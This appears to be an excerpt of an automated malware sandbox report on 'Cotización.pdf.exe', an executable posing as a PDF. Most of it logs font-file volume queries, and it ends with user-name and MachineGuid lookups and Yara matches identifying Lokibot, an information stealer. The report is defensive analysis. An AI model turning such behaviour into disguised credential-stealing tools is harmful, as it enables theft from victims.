                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 16_2_00406069 GetUserNameW,16_2_00406069
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 16.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Cotizaci#U00f3n.pdf.exe.4738e18.2.raw.unpack, type: UNPACKEDPE
